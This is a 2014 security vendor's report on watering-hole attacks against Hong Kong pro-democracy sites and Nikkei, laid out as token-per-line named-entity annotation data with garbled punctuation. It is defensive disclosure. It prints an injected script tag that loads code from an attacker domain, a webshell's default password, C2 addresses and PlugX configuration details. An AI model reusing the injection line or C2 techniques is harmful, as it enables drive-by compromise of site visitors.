Posted O
on O
October O
9 O
, O
2014 O
by O
Steven O
Adair O
Over O
the O
last O
few O
months O
, O
Volexity O
has O
been O
tracking O
a O
particularly O
remarkable O
advanced O
persistent O
threat O
( O
APT O
) O
operation O
involving O
strategic O
web O
compromises O
of O
websites O
in O
Hong O
Kong O
and O
Japan O
. O
 
In O
both O
countries O
, O
the O
compromised O
websites O
have O
been O
particularly O
notable O
for O
their O
relevance O
to O
current O
events O
and O
the O
high O
profile O
nature O
of O
the O
organizations O
involved O
. O
 
In O
particular O
the O
Hong O
Kong O
compromises O
appear O
to O
come O
on O
the O
heels O
of O
the O
Occupy O
Central O
Campaign O
shifting O
into O
high O
gear O
. O
 
These O
compromises O
were O
discovered O
following O
the O
identification O
of O
malicious B-Entity
JavaScript I-Entity
that O
had O
been O
added B-Action
to B-Modifier
legitimate O
code B-Entity
on O
the O
impacted O
websites O
. O
 
This O
code O
meant O
that O
visitors O
were O
potentially O
subjected O
to O
exploit O
and O
malicious B-Entity
Java I-Entity
Applets I-Entity
designed O
to O
install B-Action
malware B-Entity
on O
their O
systems O
. O
 
While O
investigating O
these O
cases O
, O
Volexity O
also O
discovered O
additional O
APT O
attack O
campaigns O
involving O
multiple O
other O
pro O
- O
democratic O
websites O
in O
Hong O
Kong O
. O
 
These O
attempts O
at O
exploitation O
, O
compromise O
, O
and O
digital O
surveillance O
are O
detailed O
throughout O
this O
post O
. O
 
Warning O
: O
Many O
of O
these O
websites O
may O
still O
be O
compromised O
and O
present O
a O
risk O
to O
visitors O
. O
 
Browse O
with O
caution O
. O
 
Alliance O
for O
True O
Democracy O
€ O
" O
Hong O
Kong O
Over O
the O
last O
two O
days O
, O
Volexity O
has O
observed O
malicious B-Entity
code I-Entity
being O
served B-Action
up I-Action
from B-Modifier
the O
website B-Entity
of I-Entity
the I-Entity
Alliance I-Entity
for I-Entity
True I-Entity
Democracy I-Entity
( I-Entity
ATD I-Entity
) I-Entity
in I-Entity
Hong I-Entity
Kong I-Entity
( O
www.atd.hk O
) O
. O
 
ATD O
is O
an O
alliance O
of O
people O
and O
organizations O
dedicated O
to O
democracy O
and O
universal O
suffrage O
in O
Hong O
Kong O
. O
 
At O
the O
time O
of O
this O
writing O
malicious O
code O
is O
still O
live O
on O
the O
website O
, O
so O
please O
visit O
with O
care O
until O
the O
website O
is O
clean O
. O
 
Below O
is O
a O
screen O
shot O
of O
the O
malicious O
code O
references O
found O
pre O
- O
pended O
to O
a O
JavaScript O
file O
on O
the O
website O
named O
superfish.js O
. O
 
This O
JavaScript O
file O
is O
called O
from O
other O
parts O
of O
the O
website O
and O
effectively O
nests O
the O
loading O
of O
additional O
JavaScript O
written O
and O
interpeted O
as O
. O
 
< O
script O
language O
= O
javascript O
src O
= O
http://java O
- O
se.com O
/ O
o.js</script O
> O
The O
domain O
name O
java-se.com O
is O
known O
bad O
and O
associated O
with O
APT O
activity O
. O
 
At O
the O
time O
of O
this O
post O
, O
the O
domain O
is O
hosted O
on O
the O
Japanese O
IP O
address O
210.253.101.105 O
. O
 
7506 O
| O
210.253.96.0/20 O
| O
INTERQ O
| O
JP O
| O
GMO.JP O
| O
GMO O
INTERNET O
INC O
. O
 
Volexity O
has O
yet O
to O
actually O
see O
the O
contents O
of O
the O
file O
o.js O
, O
as O
the O
websites O
has O
continuously O
returned O
HTTP O
403 O
responses O
each O
time O
it O
was O
requested O
. O
 
The O
file O
was O
requested O
from O
IP O
addresses O
throughout O
Asia O
without O
ever O
returning O
valid O
content O
. O
 
It O
€ O
™s O
unclear O
if O
this O
code O
is O
activated O
at O
certain O
times O
or O
if O
there O
is O
a O
whitelist O
of O
IPs O
restricting O
access O
to O
the O
file O
to O
specific O
targets O
. O
 
This O
same O
code O
has O
also O
been O
observed O
being O
served O
from O
another O
Hong O
Kong O
website O
described O
in O
the O
next O
section O
. O
 
While O
examining O
the O
ATD O
website O
, O
Volexity O
also O
observed O
that O
the O
site O
had O
a B-Entity
password I-Entity
protected I-Entity
backdoor I-Entity
webshell I-Entity
placed B-Action
on B-Modifier
it B-Entity
. O
 
This O
is O
a O
fairly O
popular O
webshell O
that O
Volexity O
has O
encountered O
on O
several O
occasions O
when O
dealing O
with O
website O
compromises O
. O
 
Volexity O
refers O
to O
this O
shell O
as O
the O
Angel O
Webshell O
, O
named O
after O
its O
default O
password O
of O
€ O
œangel O
€ O
​. O
 
The O
shell O
will O
simply O
display O
the O
text O
€ O
œPassword O
: O
€ O
​ O
, O
a O
text O
input O
box O
, O
and O
a O
Login O
button O
. O
 
A O
screen O
shot O
of O
the O
webshell O
as O
observed O
on O
the O
ATD O
website O
can O
be O
seen O
below O
. O
 
Despite O
the O
shell O
being O
written O
in O
PHP O
and O
only O
displaying O
a O
simple O
Login O
prompt O
, O
it O
is O
easy O
to O
identify O
the O
Angel O
webshell O
based O
on O
unique O
components O
of O
its O
viewable O
HTML O
source O
code O
. O
 
The O
HTML O
source O
of O
this O
page O
is O
displayed O
in O
the O
following O
image O
. O
 
While O
Volexity O
operates O
under O
the O
assumption O
attackers O
have O
placed O
webshells O
on O
webservers O
they O
have O
compromised O
, O
in O
this O
particular O
instance O
it O
can O
be O
seen O
with O
certainty O
. O
 
Attackers B-Entity
will O
often O
upload B-Action
new O
webshells B-Entity
or I-Entity
add I-Entity
simple I-Entity
China I-Entity
Chopper I-Entity
style I-Entity
modifications I-Entity
to O
legitimate O
existing O
files O
in O
an O
attempt O
to O
maintain O
persistence O
to O
these O
systems O
. O
 
In O
the O
last O
week O
, O
Volexity O
also O
observed O
both O
the O
English O
and O
Chinese O
language O
websites O
for O
the O
Democratic O
Party O
Hong O
Kong O
compromised O
with O
the O
same O
malicious O
code O
found O
ont O
he O
ATD O
website O
( O
www.dphk.org O
| O
eng.dphk.org O
) O
. O
 
DPHK O
is O
a O
pro O
- O
democracy O
political O
party O
in O
Hong O
Kong O
. O
 
Like O
the O
ATD O
website O
, O
at O
the O
time O
of O
this O
writing O
the B-Entity
DPHK I-Entity
websites I-Entity
are O
also O
serving B-Action
up I-Action
malicious O
code B-Entity
, O
so O
please O
browse O
with O
caution O
. O
 
During O
our O
research O
for O
this O
post O
, O
we O
also O
became O
aware O
of O
multiple O
public O
reports O
related O
to O
the O
compromise O
of O
the O
DPHK O
website O
on O
both O
Twitter O
and O
via O
ThreatConnect O
. O
 
Our O
good O
friend O
Claudio O
Giurianeri O
posted O
the O
following O
tweet O
on O
October O
3 O
, O
2014 O
The O
website O
of O
the O
Democratic O
Party O
of O
Hong O
Kong O
has O
been O
compromised O
and O
still O
is O
. O
 
Let O
them O
know O
. O
 
# O
OccupyCentral O
Diving O
further O
into O
some O
of O
the O
replies O
to O
this O
tweet O
is O
a O
plethora O
of O
information O
regarding O
the O
exploit O
domain O
java-se.com O
. O
 
In O
particular O
, O
a O
tweet O
from O
Brandon O
Dixon O
with O
relevant O
data O
from O
the O
PassiveTotal O
project O
details O
several O
subdomains O
and O
IP O
addresses O
associated O
with O
java-se.com O
. O
 
While O
Volexity O
has O
only O
observed O
a O
handful O
of O
the O
hostnames O
in O
the O
wild O
thus O
far O
, O
other O
active O
subdomains O
suggest O
there O
could O
be O
additional O
on O
- O
going O
exploit O
or O
malware O
activity O
from O
the O
domain O
. O
 
Additional O
reporting O
on O
this O
activity O
and O
another O
going O
back O
to O
August O
2014 O
was O
also O
recently O
shared O
on O
ThreatConnect O
. O
 
Despite O
all O
of O
this O
attention O
, O
the O
DPHK O
website O
is O
still O
compromised O
and O
references O
the O
JavaScript O
from O
the O
hostile O
domain O
. O
 
It O
is O
also O
worth O
noting O
that O
this O
is O
not O
the O
first O
time O
that O
the B-Entity
DPHK I-Entity
website I-Entity
has O
been B-Action
used I-Action
in O
a O
strategic O
web O
compromise O
. O
 
Back O
in O
May O
2011 O
, O
Kaspersky O
Lab O
reported O
the B-Entity
website I-Entity
was O
being B-Action
leveraged I-Action
to B-Modifier
target O
users B-Entity
with I-Entity
Flash I-Entity
Exploits I-Entity
. O
 
The O
DPHK O
appears O
to O
be O
of O
high O
value O
with O
respect O
to O
targeting O
visitors O
. O
 
During O
the O
course O
of O
investigating O
activity O
related O
to O
the O
ATD O
and O
DPHK O
websites O
, O
Volexity O
also O
observed O
that O
the B-Entity
website I-Entity
of I-Entity
the I-Entity
political I-Entity
coalition I-Entity
and I-Entity
pan I-Entity
- I-Entity
democratic I-Entity
organization I-Entity
People I-Entity
Power I-Entity
in I-Entity
Hong I-Entity
Kong I-Entity
( I-Entity
www.peoplepower.hk I-Entity
) I-Entity
had O
been B-Action
compromised I-Action
as O
well O
. O
 
However O
, O
unlike O
the O
other O
two O
websites O
, O
the O
People O
Power O
website O
did O
not O
contain O
JavaScript O
modifications O
pointing O
to O
java- O
se.com O
. O
 
Instead O
the O
website O
appears O
to O
have O
malicious O
iFrames O
leveraging O
the O
Chinese O
URL O
shortener O
985.so O
. O
 
At O
the O
bottom O
of O
several O
of O
the O
pages O
for O
the O
People O
Power O
website O
are O
four O
iFrames O
as O
seen O
in O
this O
screen O
shot O
of O
the O
website O
source O
. O
 
Those O
links O
, O
with O
the O
exception O
of O
the O
first O
one O
, O
all O
redirect O
to O
exploit O
pages O
on O
the O
Hong O
Kong O
IP O
address O
58.64.178.77 O
. O
 
These O
pages B-Entity
load B-Action
scripts B-Entity
that O
conduct B-Action
profiling I-Action
of B-Modifier
the O
system B-Entity
for I-Entity
various I-Entity
software I-Entity
, I-Entity
plugins I-Entity
, I-Entity
and I-Entity
other I-Entity
related I-Entity
information I-Entity
, O
as O
well O
as O
load O
Java B-Entity
exploits I-Entity
designed O
to O
install B-Action
malware B-Entity
on B-Modifier
the O
target B-Entity
system I-Entity
. O
 
If O
successful O
, O
the B-Entity
exploits I-Entity
will O
install B-Action
either O
a B-Entity
32-bit I-Entity
or I-Entity
64-bit I-Entity
version I-Entity
of I-Entity
the I-Entity
malware I-Entity
. O
 
Both O
files O
are O
found O
within O
the O
Java O
Archives O
files O
. O
 
Below O
are O
details O
on O
each O
of O
the O
malware O
files O
. O
 
Filename O
: O
main.dll O
File O
size O
: O
13824 O
bytes O
MD5 O
hash O
: O
1befa2c2d1bfc8e87d52871c868f75fe O
SHA1 O
hash O
: O
8f81bb0bfa6b3ebf3ef4ea283b23a5ccae5b6817 O
Notes O
: O
32-bit O
version O
of O
malware O
, O
which O
beacons O
to O
58.64.178.77:443 O
. O
 
Filename O
: O
main64.dll O
File O
size O
: O
15872 O
bytes O
MD5 O
hash O
: O
a482a84d13c76b950ce5bc7e75f4edef O
SHA1 O
hash O
: O
c0a4b9145e0066f5c1534beddc9c666ea8eb0882 O
Notes O
: O
64-bit O
version O
of O
malware O
, O
which O
beacons O
to O
58.64.178.77:443 O
. O
 
At O
the O
time O
of O
this O
writing O
, O
the B-Entity
People I-Entity
Power I-Entity
website I-Entity
is O
still O
serving B-Action
up I-Action
malicious O
code B-Entity
. O
 
Volexity O
recommends O
avoiding O
this O
website O
and/or O
browsing O
with O
caution O
. O
 
Volexity O
believes O
a O
separate O
group O
of O
attackers O
is O
responsible O
for O
this O
exploit O
activity O
and O
that O
they O
are O
not O
affiliated O
with O
the O
java-se.com O
operations O
. O
 
While O
digging O
deeper O
into O
pro O
- O
democratic O
websites O
in O
Hong O
Kong O
, O
Volexity O
also O
discovered O
peculiar O
code O
on O
the O
website O
of O
a O
pro- O
democratic O
and O
pro O
- O
universal O
suffrage O
public O
policy O
think O
thank O
The O
Professional O
Commons O
( O
www.procommons.org.hk O
) O
. O
 
In O
the O
case O
of O
this O
website O
, O
there O
is O
suspicious O
JavaScript O
code O
that O
writes O
an O
iFrame O
pointing O
back O
to O
a O
non O
- O
existent O
HTML O
page O
on O
a O
hotel O
website O
in O
South O
Korea O
. O
 
The O
code O
from O
the O
website O
can O
be O
seen O
in O
the O
screen O
shot O
below O
. O
 
The O
URL O
in O
question O
points O
to O
. O
 
hXXp://www.hotel365.co.kr O
/ O
Lnk O
/ O
tw O
/ O
index.html O
This O
link O
does O
not O
work O
and O
will O
redirect O
a O
visitor O
back O
to O
the O
main O
page O
of O
the O
website O
. O
 
There O
does O
not O
appear O
to O
be O
any O
reason O
for O
the O
Professional O
Commmons O
website O
to O
have O
a O
hidden O
iFrame O
link O
randomly O
placed O
in O
the O
middle O
of O
its O
HTML O
code O
. O
 
It O
is O
suspected O
that O
this O
was O
a O
formerly O
active O
exploit O
URL O
. O
 
If O
it O
is O
actually O
malicious O
, O
it O
is O
possible O
the O
code O
could O
be O
re O
- O
activated O
at O
any O
time O
. O
 
Volexity O
recommend O
the O
URL O
and O
the O
Professional O
Commons O
website O
be O
browsed O
with O
caution O
. O
 
In O
early O
September O
, O
the O
APT O
group O
behind O
java-se.com O
raised O
its O
visibility O
on O
Volexity O
€ O
™s O
radar O
following O
a O
compromise O
that O
effectively O
impacted O
many O
components O
of O
the O
Japanese O
Nikkei O
. O
 
In O
the O
first O
week O
of O
September O
, O
a O
subdomain O
used O
to O
load O
JavaScript O
code O
and O
additional O
files O
onto O
other O
Nikkei O
web O
properties O
such O
as O
www.nikkei.com O
and O
asia.nikkei.com O
was O
compromised O
. O
 
In O
particular O
a O
JavaScript O
file O
loaded O
from O
parts.nikkei.com O
was O
modified O
to O
reference O
another O
JavaScript O
file O
from O
jre76.java-se.com O
hosted O
on O
the O
Japanese O
IP O
address O
211.125.81.203 O
. O
 
7506 O
| O
211.125.80.0/22 O
| O
INTERQ O
| O
JP O
| O
GMO.JP O
| O
GMO O
INTERNET O
INC O
. O
 
The O
code O
has O
since O
been O
taken O
down O
. O
 
However O
, O
in O
early O
September O
the O
JavaScript O
was O
pre O
- O
pended O
to O
the O
file O
http://parts.nikkei.com/parts/SC/s_cDS.js O
as O
seen O
in O
the O
screen O
shot O
below O
. O
 
Like O
the O
JavaScript O
from O
the O
ATD O
and O
DPHK O
websites O
, O
Volexity O
was O
never O
actually O
able O
to O
obtain O
a O
live O
copy O
of O
this O
script O
. O
 
Each O
request O
results O
in O
an O
HTTP O
403 O
response O
from O
the O
server O
. O
 
Volexity O
suspects O
the O
code O
was O
either O
active O
at O
select O
times O
and/or O
was O
only O
served O
to O
a O
subset O
of O
visitors O
. O
 
The O
code O
has O
not O
been O
observed O
on O
the O
s_cDS.js O
file O
for O
nearly O
a O
month O
now O
. O
 
While O
tracking O
this O
APT O
activity O
, O
Volexity O
has O
also O
come O
across O
other O
seemingly O
unrelated O
compromises O
of O
websites O
in O
Hong O
Kong O
and O
Japan O
associated O
with O
the O
java-se.com O
activity O
. O
 
Despite O
several O
sites O
being O
compromised O
, O
the O
above O
activity O
tied O
to O
java-se.com O
did O
not O
result O
in O
the O
successful O
capture O
of O
actual O
exploit O
code O
or O
malware O
. O
 
However O
, O
research O
into O
other O
websites O
and O
activity O
involving O
java-se.com O
did O
lead O
Volexity O
to O
live O
exploits O
and O
malware O
. O
 
In O
particular O
Volexity O
came O
across O
live O
exploit O
code O
hosted O
at O
jdk-7u12-windows-i586.java-se.com O
on O
the O
Japanese O
IP O
address O
210.253.96.200 O
. O
 
7506 O
| O
210.253.96.0/20 O
| O
INTERQ O
| O
JP O
| O
GMO.JP O
| O
GMO O
INTERNET O
INC O
. O
 
This O
system O
hosted O
a B-Entity
JavaScript I-Entity
file I-Entity
, O
which O
in O
turned O
loads B-Action
a O
malicious B-Entity
Java I-Entity
Applet I-Entity
. O
 
In O
testing O
the O
the O
Java O
Applet O
pops O
up O
a O
notification O
to O
the O
user O
asking O
them O
if O
they O
want O
to O
run O
the O
applet O
. O
 
Volexity O
has O
not O
had O
enough O
time O
to O
thoroughly O
analyze O
the O
file O
to O
see O
if O
it O
is O
an O
actual O
exploit O
or O
if O
the O
attackers O
rely O
on O
user O
assisted O
malware O
installation O
. O
 
The O
pop O
- O
up O
does O
make O
it O
appear O
as O
if O
the O
file O
is O
an O
update O
to O
Java O
. O
 
The O
popup O
displayed O
by O
Java O
is O
displayed O
below O
. O
 
As O
can O
be O
seen O
in O
the O
image O
above O
, O
this O
popup O
could O
be O
misconstrued O
by O
a O
user O
as O
an O
update O
to O
Java O
despite O
the O
java-se.com O
domain O
and O
the O
Publisher O
being O
listed O
as O
WindySoft O
. O
 
Interestingly O
the O
Java O
Archive O
being O
loaded O
is O
digitally O
signed O
by O
a O
certificate O
issued O
to O
WindySoft O
, O
an O
online O
gaming O
company O
from O
South O
Korea O
. O
 
We O
can O
not O
confirm O
this O
certificate O
actually O
belonged O
to O
WindySoft O
at O
any O
point O
in O
time O
, O
however O
, O
there O
is O
fairly O
established O
precedent O
of O
certificates O
from O
online O
gaming O
companies O
being O
used O
to O
digitally O
sign O
malware O
and O
attack O
tools O
. O
 
As O
one O
might O
expect O
, O
choosing O
to O
press O
the O
Run O
button O
would O
be O
bad O
news O
for O
someone O
presented O
with O
this O
prompt O
. O
 
If O
one O
were O
to O
click O
Run O
from O
this O
prompt O
, O
it O
would O
result O
in O
the O
file O
css.jpg O
being O
download O
over O
an O
encrypted O
channel O
from O
a O
folder O
on O
https://elsa-jp.jp O
. O
 
Note O
that O
elsa-jp.jp O
is O
a O
website O
hosted O
on O
the O
same O
IP O
address O
jdk-7u12-windows-i586.java-se.com O
and O
is O
likely O
compromised O
. O
 
The O
file O
css.jpg O
is O
of O
course O
not O
a O
JPEG O
file O
, O
it O
is O
an O
executable O
that O
has O
been O
encoded O
with O
the O
single O
- O
byte O
XOR O
key O
0xFF O
. O
 
Filename O
: O
css.jpg O
File O
size O
: O
168776 O
bytes O
MD5 O
hash O
: O
b3a9e6548fb3cc511096af4d68b2e745 O
SHA1 O
hash O
: O
394703d1240ccd3aaeeef50c212313e3036741b1 O
Notes O
: O
Executable O
file O
downloaded O
by O
Java O
Applet O
that O
has O
been O
encoded O
with O
XOR O
0 O
-99 O
Taking O
a O
closer O
look O
at O
the O
resulting O
executable O
we O
have O
, O
it O
turns O
out O
it O
is O
a O
newer O
sample O
of O
PlugX. O
 
In O
this O
particular O
sample O
an O
interesting O
and O
notable O
string O
was O
observed O
. O
 
C:\wocawocawoca\piao\Release\caca.pdb O
Also O
of O
interest O
is O
that O
as O
observed O
from O
the O
Java O
Applet O
, O
the O
executable O
is O
also O
digitally O
signed O
by O
a O
certificate O
issued O
to O
€ O
œWindySoft O
. O
 
€ O
​ O
Upon O
execution O
the O
malware O
sample O
immediately O
does O
a O
DNS O
resolution O
for O
the O
following O
hostname O
. O
 
jduhf873jdu7.blog.163.com O
The B-Entity
PlugX I-Entity
sample I-Entity
connects B-Action
to B-Modifier
the O
blog B-Entity
and O
parses O
the O
page O
for O
a O
command O
for O
where O
to O
connect O
to O
next O
. O
 
This O
is O
very O
similar O
to O
the O
method O
described O
by O
FireEye O
in O
their O
blog O
on O
Operation O
Poisoned O
Hurricane O
. O
 
The O
primary O
difference O
being O
that O
the O
attackers O
opted O
to O
use O
a O
163.com O
Blog O
over O
a O
Google O
Code O
page O
to O
embed O
the O
command O
. O
 
Taking O
a O
closer O
look O
at O
the O
Blog O
page O
the O
following O
post O
is O
observed O
. O
 
The O
primary O
string O
to O
focus O
on O
is O
in O
the O
title O
of O
the O
post O
: O
DZKSCAAAAJPBBDHDDDOCCDFDFDOCCDBDHDOCHDHDDZJS O
Using O
the O
same O
decoding O
routine O
describe O
by O
Cassidian O
in O
a O
PlugX O
post O
of O
theirs O
from O
earlier O
this O
year O
, O
we O
can O
see O
this O
command O
decodes O
to O
instruct O
the O
malware O
to O
connect O
to O
a O
U.S O
.- O
based O
Linode O
IP O
address O
at O
Hurricane O
Electric O
: O
173.255.217.77 O
. O
 
6939 O
| O
173.255.208.0/20 O
| O
HURRICANE O
| O
US O
| O
LINODE.COM O
| O
LINODE O
A O
look O
at O
passive O
DNS O
identifies O
several O
hostnames O
that O
recently O
resolved O
to O
the O
IP O
address O
. O
 
The O
ones O
that O
still O
resolve O
to O
the O
IP O
are O
listed O
below O
. O
 
These O
hostnames O
may O
be O
related O
but O
at O
the O
time O
of O
this O
writing O
we O
have O
not O
seen O
them O
in O
use O
in O
malware O
and O
are O
unable O
to O
confirm O
. O
 
As O
we O
have O
seen O
for O
several O
years O
now O
, O
dissenting O
groups O
, O
especially O
those O
seeking O
increased O
levels O
of O
freedom O
frequently O
find O
themselves O
targeted O
for O
surveillance O
and O
information O
extraction O
. O
 
In O
the O
digital O
age O
, O
a O
strategic O
web O
compromise O
( O
exploit O
drive O
- O
by O
) O
has O
become O
a O
key O
weapon O
of O
choice O
for O
to O
conduct O
such O
operations O
. O
 
These O
types O
of O
attacks O
are O
far O
from O
overt O
, O
as O
a O
typical O
target O
and O
victim O
opted O
to O
go O
on O
their O
own O
to O
what O
they O
believe O
should O
be O
a O
safe O
and O
trusted O
website O
. O
 
In O
the O
case O
of O
this O
post O
, O
it O
appears O
that O
at O
least O
two O
different O
attackers O
were O
involved O
in O
compromising O
and O
placing B-Action
malicious O
code B-Entity
on B-Modifier
Pro O
- B-Entity
Democratic I-Entity
websites I-Entity
in I-Entity
Hong I-Entity
Kong I-Entity
. O
 
This O
is O
not O
the O
first O
time O
and O
surely O
will O
not O
be O
the O
last O
time O
that O
those O
in O
favor O
of O
democracy O
in O
Hong O
Kong O
will O
be O
targeted O
. O
 
Unfortunately O
with O
the O
level O
of O
access O
and O
infrastructure O
the O
attackers O
appear O
to O
have O
, O
this O
is O
quite O
an O
uphill O
battle O
. O
 
Continuing O
to O
expose O
these O
attack O
is O
one O
means O
that O
shines O
light O
on O
these O
attack O
operations O
with O
an O
aim O
at O
putting O
a O
dent O
in O
their O
success O
. O
 
